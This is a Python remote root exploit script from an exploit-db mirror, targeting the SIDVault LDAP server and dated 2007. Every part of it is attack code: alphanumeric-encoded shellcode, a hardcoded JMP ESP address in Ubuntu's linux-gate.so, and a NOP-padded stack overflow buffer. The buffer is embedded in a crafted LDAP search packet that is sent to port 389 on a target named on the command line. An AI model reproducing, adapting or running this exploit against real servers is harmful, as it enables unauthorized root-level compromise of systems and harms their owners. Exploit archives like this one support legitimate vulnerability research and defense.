exploit-db-mirror/platforms/linux/remote/4315.py

#!/usr/bin/python

"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""

import sys
import socket

sc  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35"
sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49"
sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36"
sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56"
sc += "\x48\x56\x4a\x55\x42\x45\x41\x55\x48\x35\x49\x48\x41\x4e\x4d\x4c"
sc += "\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x48\x44\x35"
sc += "\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e\x42\x4b\x48\x36\x4d\x4c"
sc += "\x42\x38\x43\x39\x4c\x46\x44\x30\x49\x55\x42\x4b\x4f\x43\x4d\x4c"
sc += "\x42\x38\x49\x54\x49\x47\x49\x4f\x42\x4b\x4b\x50\x44\x35\x4a\x46"
sc += "\x4f\x32\x4f\x42\x43\x57\x4a\x46\x4a\x36\x4f\x32\x44\x56\x49\x36"
sc += "\x50\x46\x49\x38\x43\x4e\x44\x45\x43\x35\x49\x58\x41\x4e\x4d\x4c"
sc += "\x42\x48\x5a"

#
# The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so)
#
addr = "\x77\xe7\xff\xff"

theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc

pkt  = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
pkt += theLine
pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(pkt)
s.close()

# milw0rm.com [2007-08-25]